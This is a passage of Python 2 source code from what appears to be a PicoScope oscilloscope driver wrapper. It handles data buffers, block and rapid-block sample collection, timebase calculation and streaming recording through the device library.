:returns: status of the calls :rtype: int """ if self._handle <= 0 or index not in self._buffers: return False try: with self._buffers[index].access_lock: if self._buffers[index].inuse.acquire(False): try: self._buffers[index].inuse.release() except: return True else: return True except: return False return False def unlock_all_buffers(self): """ Unlocks all currently allocated and locked buffers :returns: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if hasattr(self, "buffers"): for index in self._buffers.keys(): self.unlock_buffer(index) def release_buffer(self, index): """ Removes buffer from requested index :param index: buffer index number :type index: int :returns: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if index not in self._buffers: return pico_num("PICO_INVALID_BUFFER") """ deallocate memory """ self.unlock_buffer(index) with self._buffers[index].access_lock: a = self._buffers[index].access_lock self._buffers[index] = None self._buffers.pop(index) return pico_num("PICO_OK") def release_all_buffers(self): """ Removes all allocated buffers :returns: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if hasattr(self, "buffers"): for index in self._buffers.keys(): self.release_buffer(index) self._buffers.clear() def get_buffer_info(self, index): """ Returns dictionary with buffer setup dict: { index, channel, samples, segment, mode, downsample, last_interval, last_timebase, real_interval } :param index: buffer index number :type index: int :returns: status of the calls :rtype: tuple(int, dict()) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), {} if index not in self._buffers: return pico_num("PICO_INVALID_BUFFER"), {} with self._buffers[index].access_lock: return pico_num("PICO_OK"), { "index": index, "channel": self._buffers[index].channel, "samples": self._buffers[index].samples, 
"segment": self._buffers[index].segment, "mode": self._buffers[index].mode, "downsample": self._buffers[index].downsample, "last_interval": self._buffers[index].last_interval, "last_timebase": self._buffers[index].last_timebase, "real_interval": self._buffers[index].real_interval } def get_buffer_data(self, index, unlock=True): """ Returns contents of the requested buffer in the form numpy array :param index: buffer index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data :rtype: tuple(int, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: return pico_num("PICO_OK"), self._buffers[index].data def get_buffer_volts(self, index, scale=1.0, unlock=True): """ Returns contents of the requested buffer in the form of numpy array Results can be scaled depending on value of scale parameter :param index: buffer index number :type index: int :param scale: scale of the data on return :type scale: float :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data :rtype: tuple(int, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [] with self._buffers[index].access_lock: if self._buffers[index].data is None: return pico_num("PICO_INVALID_BUFFER"), [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: factor = \ scale * \ (self.m.Ranges.values[self._channel_set[self._buffers[index].channel].range] / self.info.max_adc) return pico_num("PICO_OK"), self._buffers[index].data * factor def get_buffer_states(self, index, unlock=True): """ Returns contents of the requested buffer in the form of multidimensional numpy array :param index: buffer 
index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data :rtype: tuple(int, np.ndarray) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [] with self._buffers[index].access_lock: if self._buffers[index].data is None: return pico_num("PICO_INVALID_BUFFER"), [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: return pico_num("PICO_OK"), np.array( [self._buffers[index].data & (1 << b) for b in range(0, 8)], dtype=bool) def get_min_max_data(self, index, unlock=True): """ Returns contents of the requested buffer in the form of 2 np.arrays This call applies only to aggregated mode :param index: buffer index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data_min, data_max :rtype: tuple(int, np.array, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [], [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [], [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: if self._buffers[index].data_min is not None: return pico_num("PICO_OK"), self._buffers[index].data_min, self._buffers[index].data else: return pico_num("PICO_OK"), self._buffers[index].data, self._buffers[index].data def get_min_max_volts(self, index, scale=1.0, unlock=True): """ Returns contents of the requested buffer in the form of 2 np.arrays This call applies only to aggregated mode :param index: buffer index number :type index: int :param scale: scale of the data on return :type scale: float :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data_min, data_max :rtype: tuple(int, np.array, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [], [] if index not in 
self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [], [] with self._buffers[index].access_lock: if self._buffers[index].data is None: return pico_num("PICO_OK"), [], [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: factor = \ scale * \ (self.m.Ranges.values[self._channel_set[self._buffers[index].channel].range] / self.info.max_adc) if self._buffers[index].data_min is not None: return pico_num("PICO_OK"), \ self._buffers[index].data_min * factor, self._buffers[index].data * factor else: a = self._buffers[index].data * factor return pico_num("PICO_OK"), a, a def get_min_max_states(self, index, unlock=True): """ Returns contents of the requested buffer in the form of 2 multidimensional np.arrays This call applies only to aggregated mode :param index: buffer index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data_min, data_max :rtype: tuple(int, np.ndarray, np.ndarray) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [], [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [], [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: if self._buffers[index].data is None: return pico_num("PICO_OK"), [], [] if self._buffers[index].data_min is not None: return pico_num("PICO_OK"), np.array( [self._buffers[index].data_min & (1 << b) for b in range(0, 8)], dtype=bool), np.array( [self._buffers[index].data & (1 << b) for b in range(0, 8)], dtype=bool) else: a = np.array([self._buffers[index].data & (1 << b) for b in range(0, 8)], dtype=bool) return pico_num("PICO_OK"), a, a def get_ets_data(self, index, unlock=True): """ Returns contents of the requested buffer in the form of 2 numpy arrays: times, data :param index: buffer index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, times, data_max :rtype: 
tuple(int, np.array, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [], [] if index not in self._buffers.keys() or self._ets.time is None: return pico_num("PICO_INVALID_BUFFER"), [], [] if unlock: self.unlock_buffer(index) return pico_num("PICO_OK"), self._ets.time, self._buffers[index].data def collect_segment(self, segment, interval=None, event_handle=None, timebase=None, block=True, bulk=False, overlapped=False): """ Runs Block data collection on(from) given segment. Can explicitly use supplied timebase if given or calculate one. Buffers have to be set at least on one channel to make this call work. :param segment: memory segment number to start the collection on (from) :type segment: int :param interval: sample interval in nanoseconds :type interval: float :param event_handle: event handle to use during the collection, once device is ready, it is set :type event_handle: Event :param timebase: explicit (forced) timebase value :type timebase: int :param block: whether to block the call, requires event_handle if False :type block: bool :param bulk: collect segments in bulk, better use collect_segments call :type bulk: bool :param overlapped: use overlapped buffer in collection :type overlapped: bool :returns: status of the call :rtype int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if segment > self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE") """ We expect only one collection at the time """ for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY") """ Locate buffers taking part in collection """ if bulk: if self._bulk_indexes is None or len(self._bulk_indexes) == 0: return pico_num("PICO_INVALID_BUFFER") indexes = self._bulk_indexes else: indexes = () for index in self._buffers.keys(): if self._buffers[index].segment == segment: indexes += (index,) if len(indexes) == 0: return pico_num("PICO_INVALID_BUFFER") """ pick the 
longest sample number from defined buffers """ samples = 0 for index in indexes: with self._buffers[index].access_lock: if self._buffers[index].segment == segment: if self._buffers[index].mode == self.m.RatioModes.none: samples = max(samples, self._buffers[index].samples) else: samples = max(samples, self._buffers[index].samples * self._buffers[index].downsample) break if samples == 0: return pico_num("PICO_INVALID_BUFFER") """ ets setup """ if self._ets.mode != self._ets.last: if self._ets.mode == self.m.ETSModes.off: self._ets.status = ldlib.SetEts(self._chandle, c_int32(self.m.ETSModes.off), c_int16(self._ets.cycles), c_int16(self._ets.interleaves), None) if self._ets.status == pico_num("PICO_OK"): self._ets.last = self.m.ETSModes.off elif (self.trigger or True in [c.is_set() for c in (self.trigger_conditions + self.pwq_conditions)]) \ and len([1 for p in self._port_set.keys() if self._port_set[p].enabled]) == 0: picos = c_int32(0) self._ets.status = ldlib.SetEts(self._chandle, c_int32(self._ets.mode), c_int16(self._ets.cycles), c_int16(self._ets.interleaves), byref(picos)) if self._ets.status == pico_num("PICO_OK"): self._ets.last = self._ets.mode self._ets.picos = picos.value """ calculate timebase from interval """ finterval = c_float(0.0) linterval = c_float(0.0) if self._ets.last != self.m.ETSModes.off and self._ets.status == pico_num("PICO_OK"): timebase = 1 finterval.value = interval = float(picos.value) / 1000.0 if isinstance(interval, (int, long)): interval = float(interval) if timebase is not None and self._ets.last == self.m.ETSModes.off: status = self._get_timebase(timebase=timebase, samples=samples, ref_interval=byref(finterval), oversample=0, ref_maxsamples=None, segment=segment) if status != pico_num("PICO_OK"): return status if timebase is None: for index in indexes: with self._buffers[index].access_lock: if self._buffers[index].last_interval is not None \ and self._buffers[index].last_timebase is not None: if self._buffers[index].last_interval 
== interval: timebase = self._buffers[index].last_timebase finterval.value = self._buffers[index].real_interval break if timebase is None: last = 0 status = pico_num("PICO_OK") for pwr in range(0, 32): rough = 1 << pwr status = self._get_timebase(timebase=rough, samples=samples, ref_interval=byref(finterval), oversample=0, ref_maxsamples=None, segment=segment) if status not in (pico_num("PICO_OK"), pico_num("PICO_INVALID_TIMEBASE")) \ or finterval.value >= interval: break last = rough else: rough = last if status == pico_num("PICO_TOO_MANY_SAMPLES"): return status if last == rough or finterval.value == interval: timebase = rough else: if last <= 32: fine = rough for fine in range(int(last / 2), 64): status = self._get_timebase(timebase=fine, samples=samples, ref_interval=byref(finterval), oversample=0, ref_maxsamples=None, segment=segment) if status == pico_num("PICO_OK") and finterval.value >= interval: break linterval.value = finterval.value if abs(interval - finterval.value) <= abs(interval - linterval.value): timebase = fine else: timebase = max(1, fine - 1) finterval.value = linterval.value if linterval.value > 0 else interval else: """ bubble :) """ i = 1 linterval.value = finterval.value fine = rough while timebase is None: if i >= 32: timebase = fine break elif linterval.value > interval: fine -= int((rough - last) / pow(2, i)) elif linterval.value < interval: fine += int((rough - last) / pow(2, i)) else: timebase = fine continue status = self._get_timebase(timebase=fine, samples=samples, ref_interval=byref(finterval), oversample=0, ref_maxsamples=None, segment=segment) if status == pico_num("PICO_OK") and finterval.value in (interval, linterval.value): timebase = fine continue linterval.value = finterval.value i += 1 else: pass if not bulk: self._lock_buffer(index) for index in indexes: with self._buffers[index].access_lock: self._buffers[index].last_interval = interval self._buffers[index].last_timebase = timebase self._buffers[index].real_interval = 
finterval.value """ setup callback """ self._collect_cb_type = self._block_ready() self._collect_cb_func = self._collect_cb_type(self._collect_cb) self._collect_indexes = indexes if event_handle is not None: self._collect_event = event_handle self._collect_event.clear() if self.trigger or True in [c.is_set() for c in (self.trigger_conditions + self.pwq_conditions)]: pretrig = int(samples * self.trigg_ratio) posttrig = samples - pretrig else: pretrig = 0 posttrig = samples if overlapped: status = self.set_overlapped_buffers(self._collect_indexes) if status != pico_num("PICO_OK"): return status """ run block collection """ try: status = self._run_block(pretrig=pretrig, posttrig=posttrig, timebase=timebase, oversample=0, ref_time=None, segment=segment, ref_cb=self._collect_cb_func, ref_cb_param=None) except Exception as ex: print "Run Block(%d):" % sys.exc_info()[-1].tb_lineno, ex.message, type(ex) self.stop() status = pico_num("PICO_OPERATION_FAILED") if status != pico_num("PICO_OK"): return status if block: self._collect_event.wait() if not overlapped: if bulk: status = self._get_buffer_values_bulk(self._collect_indexes) else: status = self._get_buffer_values(self._collect_indexes) else: if bulk: pass else: for c in self._channel_set.keys(): self._channel_set[c].overvoltaged = self._overlapped_ov.value & (1 << c) != 0 self._collect_event.clear() return status else: return pico_num("PICO_OK") def _run_block(self, pretrig, posttrig, timebase, oversample, ref_time, segment, ref_cb, ref_cb_param): return ldlib.RunBlock(self._chandle, c_int32(pretrig), c_int32(posttrig), c_uint32(timebase), c_int16(oversample), ref_time, c_uint32(segment), ref_cb, ref_cb_param) def collect_segment_overlapped(self, segment, interval=None, event_handle=None, timebase=None, block=True): """ Runs Block data collection on(from) given segment in overlapped setup. Can explicitly use supplied timebase if given or calculate one. 
Buffers have to be set at least on one channel to make this call work. :param segment: memory segment number to start the collection on (from) :type segment: int :param interval: sample interval in nanoseconds :type interval: float :param event_handle: event handle to use during the collection, once device is ready, it is set :type event_handle: Event :param timebase: explicit (forced) timebase value :type timebase: int :param block: whether to block the call, requires event_handle if False :type block: bool :param bulk: collect segments in bulk, better use collect_segments call :type bulk: bool :param overlapped: use overlapped buffer in collection :type overlapped: bool :returns: status of the call :rtype int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") return self.collect_segment(segment=segment, interval=interval, event_handle=event_handle, timebase=timebase, block=block, overlapped=True) def _collect_cb(self, *args): """ Callback function for collect segment run block """ try: if self._collect_event is not None: self._collect_event.set() except: return def collect_segments(self, start_segment, stop_segment, interval=None, event_handle=None, timebase=None, block=True): """ Initiates Rapid Block Collection :param start_segment: number of segment to start the collection from :type start_segment: int :param stop_segment: number of last segment to be collected :type stop_segment: int :param interval: nanoseconds per sample, optional if timebase specified :type interval: int :param event_handle: reference to the event object to notify about completion :type event_handle: threading._Event :param timebase: optional timebase to skip internal calculation from interval :type timebase: int :return: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if start_segment >= self._segments or stop_segment >= self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE") for e in (self._collect_event, 
self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY") number = stop_segment - start_segment + 1 if stop_segment >= start_segment \ else self._segments - start_segment + stop_segment + 1 status = self._set_no_of_captures(number=number) if status != pico_num("PICO_OK"): return status segs = (start_segment,) if start_segment == stop_segment \ else range(start_segment, stop_segment + 1) if stop_segment > start_segment \ else range(start_segment, self._segments) + range(0, stop_segment + 1) self._bulk_indexes = () for index in self._buffers.keys(): with self._buffers[index].access_lock: if self._buffers[index].segment in segs: self._bulk_indexes += (index,) self._start_segment = start_segment self._stop_segment = stop_segment status = self.collect_segment(start_segment, interval=interval, event_handle=event_handle, timebase=timebase, bulk=True, block=block) self._start_segment = None self._stop_segment = None for index in self._buffers.keys(): with self._buffers[index].access_lock: if self._buffers[index].segment == start_segment: interval = self._buffers[index].last_interval timebase = self._buffers[index].last_timebase real_int = self._buffers[index].real_interval break else: interval = 0 timebase = 0 real_int = 0 for index in self._buffers.keys(): with self._buffers[index].access_lock: if self._buffers[index].segment in segs: self._buffers[index].last_interval = interval self._buffers[index].last_timebase = timebase self._buffers[index].real_interval = real_int self._lock_buffer(index) return status def set_overlapped_buffers(self, indexes): """ Preallocate collection buffers in overlapped mode :param indexes: list of buffer indexes to preallocate :type indexes: list, tuple :return: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if len(indexes) == 0: return pico_num("PICO_INVALID_BUFFER") """ get values into buffers """ self._overlapped_samples.value = 0 status = 
pico_num("PICO_OK") segs = () ds = None mode = 0 for index in indexes: with self._buffers[index].access_lock: if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER") self._buffers[index].nanooffset = 0 if self._buffers[index].samples > self._overlapped_samples.value: self._overlapped_samples.value = self._buffers[index].samples if self._buffers[index].segment not in segs: segs += (self._buffers[index].segment,) if ds is None: ds = self._buffers[index].downsample elif ds != self._buffers[index].downsample: return pico_num("PICO_INVALID_BUFFER") mode |= self._buffers[index].mode self._overlapped_samples.value *= ds if len(segs) == 0: return pico_num("PICO_INVALID_BUFFER") elif len(segs) > 1: self._overlapped_ov = np.zeros(shape=(len(segs), ), dtype=c_uint32) status = ldlib.GetValuesOverlappedBulk(self._chandle, c_uint32(0), byref(self._overlapped_samples), c_uint32(ds), c_int32(mode), c_uint32(min(segs)), c_uint32(max(segs)), self._overlapped_ov.ctypes) else: self._overlapped_ov = c_uint32(0) status = ldlib.GetValuesOverlapped(self._chandle, c_uint32(0), byref(self._overlapped_samples), c_uint32(ds), c_int32(mode), c_uint32(segs[0]), byref(self._overlapped_ov)) if status != pico_num("PICO_OK"): return status """ set buffer on the driver """ for index in indexes: with self._buffers[index].access_lock: if self._buffers[index].data is None or len(self._buffers[index].data) != self._buffers[index].samples: self._buffers[index].data = np.empty(self._buffers[index].samples, c_int16) if self._buffers[index].mode == self.m.RatioModes.agg: if self._buffers[index].data_min is None \ or len(self._buffers[index].data_min) != self._buffers[index].samples: self._buffers[index].data_min = np.empty(self._buffers[index].samples, c_int16) status = self._setbuffers(indexes) return status def _set_no_of_captures(self, number): return ldlib.SetNoOfCaptures(self._chandle, c_uint32(number)) def _get_buffer_values(self, indexes): """ Pulls values from the driver to the 
buffer of requested indexes :param indexes: list of index of buffers to fill them with data :type indexes: tuple :return: picostatus number of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") """ get values into buffers """ status = pico_num("PICO_OK") segment = None modes = {} max_samples = 0 for index in indexes: with self._buffers[index].access_lock: if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER") if segment is None: segment = self._buffers[index].segment elif segment != self._buffers[index].segment: return pico_num("PICO_TOO_MANY_SEGMENTS") self._buffers[index].nanooffset = 0 bufflen = self._buffers[index].samples if bufflen > max_samples: max_samples = bufflen """ set buffer on the driver """ if self._buffers[index].data is None or len(self._buffers[index].data) != bufflen: self._buffers[index].data = np.empty(bufflen, c_int16) if self._buffers[index].mode == self.m.RatioModes.agg: if self._buffers[index].data_min is None or len(self._buffers[index].data_min) != bufflen: self._buffers[index].data_min = np.empty(bufflen, c_int16) if self._buffers[index].mode not in modes.keys(): modes[self._buffers[index].mode] = self._buffers[index].downsample status = self._setbuffer(index) if status != pico_num("PICO_OK"): continue if self._ets.mode != self.m.ETSModes.off and self._ets.mode == self._ets.last: if self._ets.time is None or len(self._ets.time) != max_samples: self._ets.time = np.empty(max_samples, c_int64) status = ldlib.SetEtsTimeBuffer(self._chandle, self._ets.time.ctypes, max_samples) else: self._ets.time = None """ copy data """ overvoltaged = c_int16(0) for mode in modes.keys(): samples = c_uint32(max_samples * (modes[mode] if modes[mode] else 1)) self._get_values(start=0, ref_samples=byref(samples), ratio=modes[mode], mode=mode, segment=segment, ref_overflow=byref(overvoltaged)) status = ldlib.SetEtsTimeBuffer(self._chandle, None, samples.value) """ tell driver to release buffers """ status 
= self._setbuffers(indexes, False) """ check for overvoltage """ if overvoltaged.value != 0: for c in self._channel_set.keys(): self._channel_set[c].overvoltaged = overvoltaged.value & (1 << c) != 0 return status def _get_values(self, start, ref_samples, ratio, mode, segment, ref_overflow): return ldlib.GetValues(self._chandle, c_uint32(start), ref_samples, c_uint32(ratio), c_int32(mode), c_uint32(segment), ref_overflow) def _get_buffer_values_bulk(self, indexes): """ Pulls values from the driver to the buffer of requested indexes - in one bulk :param indexes: list of index of buffers to fill them with data :type indexes: tuple :return: picostatus number of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if self._start_segment is None or self._stop_segment is None: return pico_num("PICO_INVALID_BUFFER") """ organise time offsets """ nanooffsets = {} length = self._stop_segment - self._start_segment + 1 if self._stop_segment >= self._start_segment \ else self._segments - self._start_segment + self._stop_segment + 1 offsets = np.zeros(length, dtype=c_int64) units = np.zeros(length, dtype=c_int32) status = self._get_values_trigger_time_offset_bulk(ref_offsets=offsets.ctypes, ref_units=units.ctypes, start_segment=self._start_segment, stop_segment=self._stop_segment) if status != pico_num("PICO_OK"): return status segment = self._start_segment for i in range(0, length): nanooffsets[segment] = offsets[i] * (10 ** self.m.TimeUnits.nanofactors(units[i])) segment += 1 if segment >= self._segments: segment = 0 """ get values into buffers """ samples = c_uint32() mode = self.m.RatioModes.none if len(indexes) > 0: with self._buffers[indexes[0]].access_lock: samples.value = self._buffers[indexes[0]].samples ratio = self._buffers[indexes[0]].downsample else: return pico_num("PICO_NO_SAMPLES_AVAILABLE") for index in indexes: with self._buffers[index].access_lock: if self._buffers[index].samples != samples.value or 
self._buffers[index].downsample != ratio: return pico_num("PICO_INVALID_BUFFER") self._buffers[index].nanooffset = nanooffsets[self._buffers[index].segment] """ set buffer on the driver """ if self._buffers[index].data is None or len(self._buffers[index].data) != samples.value: self._buffers[index].data = np.empty(samples.value, c_int16) if self._buffers[index].mode == self.m.RatioModes.agg: if self._buffers[index].data_min is None or len(self._buffers[index].data_min) != samples.value: self._buffers[index].data_min = np.empty(samples.value, c_int16) mode |= self._buffers[index].mode status = self._setbuffers(indexes) if status != pico_num("PICO_OK"): return status overvoltaged = np.zeros(length, dtype=c_int16) status = self._get_values_bulk(ref_samples=byref(samples), start_segment=self._start_segment, stop_segment=self._stop_segment, ratio=ratio, mode=mode, ref_overflow=overvoltaged.ctypes) if status != pico_num("PICO_OK"): return status """ check for overvoltage """ for c in self._channel_set.keys(): bit = 1 << c self._channel_set[c].overvoltaged = bit in (overvoltaged & bit) """ tell driver to release buffers """ status = self._setbuffers(indexes, False) return status def _setbuffer(self, index, enable=True): return self._setbuffers(indexes=(index,), enable=enable) def _setbuffers(self, indexes, enable=True): for index in indexes: with self._buffers[index].access_lock: status = \ self._set_data_buffers(line=self._buffers[index].channel, buffer_max=self._buffers[index].data.ctypes if enable else None, buffer_min=(self._buffers[index].data_min.ctypes if enable and self._buffers[index].mode == self.m.RatioModes.agg else None), bufflen=self._buffers[index].samples, segment=self._buffers[index].segment, mode=self._buffers[index].mode) if status != pico_num("PICO_OK"): return status return pico_num("PICO_OK") def _get_values_trigger_time_offset_bulk(self, ref_offsets, ref_units, start_segment, stop_segment): return ldlib.GetValuesTriggerTimeOffsetBulk(self._chandle, 
ref_offsets, ref_units, c_uint32(start_segment), c_uint32(stop_segment)) def _get_values_bulk(self, ref_samples, start_segment, stop_segment, ratio, mode, ref_overflow): return ldlib.GetValuesBulk(self._chandle, ref_samples, c_uint32(start_segment), c_uint32(stop_segment), c_uint32(ratio), c_int32(mode), ref_overflow) def load_tape(self, tape): """ Loads/sets which streaming tape to use :param tape: tape object :type tape: StreamingTape :returns: status of the call :rtype int """ if self._tape is not None: self.eject_tape() if isinstance(tape, StreamingTape): self._tape = tape return pico_num("PICO_OK") else: return pico_num("PICO_INVALID_PARAMETER") def eject_tape(self): """ Removes tape reference and prunes recording buffers :returns: PICO_OK :rtype: int """ if self._tape is not None: self._tape = None self._records = None self._leavers = None return pico_num("PICO_OK") def start_recording(self, interval, units, mode, downsample=1, memlength=0, limit=0, chapter=None): """ Initiates Stream recording to the tape with requested sampling interval :param interval: interval per collected raw sample :type interval: int :param units: interval units, from TimeUnits :type units: int :param mode: data reduction mode, from RatioModes :type mode: int :param downsample: data reduction ratio :type downsample: int :param memlength: number of raw samples in memory buffers :type memlength: int :param limit: number of samples at which device will issue autostop, 0 to stream until stopped. Required for horizontal trigger ratio in streaming to work. 
:type limit: int :param chapter: Chapter name for the records :type chapter: string, None :rtype: int :returns: status of the call """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if units not in self.m.TimeUnits.map: return pico_num("PICO_INVALID_TIMEBASE") if self._tape is None: return pico_num("PICO_BUFFERS_NOT_SET") for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY") if downsample == 0: return pico_num("PICO_INVALID_PARAMETER") with self._recording_lock: """ Gather how many channels/ports are enabled/engaged """ enabled = len([1 for c in self._channel_set.keys() if self._channel_set[c].enabled]) engaged = len([1 for p in self._port_set.keys() if self._port_set[p].enabled]) """ none of the channels/ports are enabled """ if enabled + engaged == 0: if enabled == 0: return pico_num("PICO_INVALID_CHANNEL") if engaged == 0: return pico_num("PICO_INVALID_DIGITAL_PORT") """ initialize records """ self._records = StreamingTapeRecording() self._leavers = None self._records.device = self.info.variant_info self._records.serial = self.info.batch_and_serial """ Determine how many ratio modes to set up """ self._records.modes = self.m.RatioModes.mode2dict(mode) # overview buff len if memlength == 0: if limit == 0: # half a second of data desired = \ int(interval * float(pow(10, self.m.TimeUnits.secfactors(units))) * ceil((enabled + engaged) / 2.0)) bufflen = min(desired, STREAM_LENGTH) else: bufflen = limit else: bufflen = memlength if limit == 0: samples = bufflen * downsample else: samples = limit * downsample if bufflen > samples: bufflen = samples if chapter is None: self._records.chapter = self._make_chapter_tag() else: self._records.chapter = chapter self._records.enabled = enabled + engaged self._records.units = units self._records.mode = mode self._records.downsample = downsample self._records.bufflen = bufflen self._records.max_samples = samples self._records.buffers = 
{} if limit > 0: self._records.final = False triggadv = (True in [c.is_set() for c in self.trigger_conditions]) triggpwq = (True in [c.is_set() for c in self.pwq_conditions]) if self.trigger or triggadv or triggpwq: self._records.triggerSet = True self._records.triggered = False pretrigger = min(samples, int(samples * self.trigg_ratio)) postrigger = samples - pretrigger if self.trigger: self._records.triggerSource = self.trigg_source self._records.triggerThreshold = self.trigg_threshold self._records.triggerDirection = self.trigg_direction if triggadv: self._records.triggerConditions = self.trigger_conditions self._records.triggerAnalog = self.trigger_analog self._records.triggerDigital = self.trigger_digital if triggpwq: self._records.pwqConditions = self.pwq_conditions self._records.pwqDirection = self.pwq_direction self._records.pwqLower = self.pwq_lower self._records.pwqUpper = self.pwq_upper self._records.pwqType = self.pwq_type else: self._records.triggerSet = False pretrigger = 0 postrigger = samples lines = () for chann in [c for c in self._channel_set.keys() if self._channel_set[c].enabled]: self._records.buffers[chann] = {} self._records.buffers[chann]["range"] = self._channel_set[chann].range self._records.buffers[chann]["scale"] = self.m.Ranges.values[self._channel_set[chann].range] lines += (chann,) for port in [p for p in self._port_set.keys() if self._port_set[p].enabled]: self._records.buffers[port] = {} self._records.buffers[port]["level"] = self._port_set[port].level lines += (port,) """ forcibly create raw buffer, if single """ for line in lines: status = pico_num("PICO_OK") if self._records.mode == self.m.RatioModes.raw: self._records.buffers[line]["raw"] = np.empty(shape=(self._records.bufflen,), dtype=c_int16) status = self._set_data_buffers(line=line, buffer_max=self._records.buffers[line]["raw"].ctypes, buffer_min=None, bufflen=self._records.bufflen, segment=0, mode=self.m.RatioModes.raw) else: for m in self._records.modes: if 
self._records.modes[m] == self.m.RatioModes.agg: self._records.buffers[line]["min"] = np.empty(shape=(self._records.bufflen,), dtype=c_int16) self._records.buffers[line]["max"] = np.empty(shape=(self._records.bufflen,), dtype=c_int16) status = self._set_data_buffers(line=line, buffer_max=self._records.buffers[line]["max"].ctypes, buffer_min=self._records.buffers[line]["min"].ctypes, bufflen=self._records.bufflen, segment=0, mode=self.m.RatioModes.agg) else: self._records.buffers[line][m] = np.empty(shape=(self._records.bufflen,), dtype=c_int16) status = self._set_data_buffers(line=line, buffer_max=self._records.buffers[line][m].ctypes, buffer_min=None, bufflen=self._records.bufflen, segment=0, mode=self._records.modes[m]) if status != pico_num("PICO_OK"): return status interval = c_uint32(interval) status = self._run_streaming(ref_interval=byref(interval), units=units, pretrig=pretrigger, posttrig=postrigger, autostop=(limit > 0), ratio=downsample, mode=mode, overview=bufflen) if status != pico_num("PICO_OK"): return status self._records.interval = interval.value try: self._recording_thread = Thread(target=self._recording_worker, args=(None,)) if self._recording_event.is_set(): self._recording_event.clear() self._recording_thread.start() except Exception as ex: if not self._recording_event.is_set(): self._recording_event.set() self.last_error = ex.message print "Streaming Start(%d):" % sys.exc_info()[-1].tb_lineno, self.last_error, type(ex) return pico_num("PICO_STREAMING_FAILED") return pico_num("PICO_OK") def _run_streaming(self, ref_interval, units, pretrig, posttrig, autostop, ratio, mode, overview): return ldlib.RunStreaming(self._chandle, ref_interval, c_int32(units), c_uint32(pretrig), c_uint32(posttrig), c_int16(autostop), c_uint32(ratio), c_int32(mode), c_uint32(overview)) @staticmethod def _make_chapter_tag(): return time.strftime("%Y%m%d_%H%M%S") def stop_recording(self): """ Stops recording (Thanks, Captain Obvious !!!) 
    def _recording_worker(self, *args):
        """ Worker used in Streaming Collections

        Runs on a background thread started by start_recording(). Polls the
        driver for the latest streamed values until the recording event is
        set, a hard driver error occurs, or the tape stops processing.
        Actual data delivery happens in self._recording_cb, which the driver
        invokes from inside GetStreamingLatestValues.
        """
        try:
            """ setup callback """
            # Keep references to both the callback factory type and the
            # wrapped function on self so the driver's pointer stays alive.
            self._recording_cb_type = self._streaming_ready()
            self._recording_cb_func = self._recording_cb_type(self._recording_cb)
            while not self._recording_event.is_set():
                with self._recording_lock:
                    s = ldlib.GetStreamingLatestValues(self._chandle, self._recording_cb_func, None)
                    # Leave the loop on any status other than OK/BUSY, or
                    # once the tape reports it is no longer processing.
                    if s not in (pico_num("PICO_OK"), pico_num("PICO_BUSY")) \
                            or (self._tape is not None and not self._tape.is_processing()):
                        break
            ldlib.Stop(self._chandle)
            if self._tape is not None:
                # A None record signals end-of-stream to the tape.
                self._tape.record(None)
        except Exception as ex:
            self.last_error = ex.message
            print "Streaming Worker(%d):" % sys.exc_info()[-1].tb_lineno, self.last_error, type(ex)
        finally:
            # Always clear the event so a subsequent start_recording can run.
            with self._recording_lock:
                self._recording_event.clear()
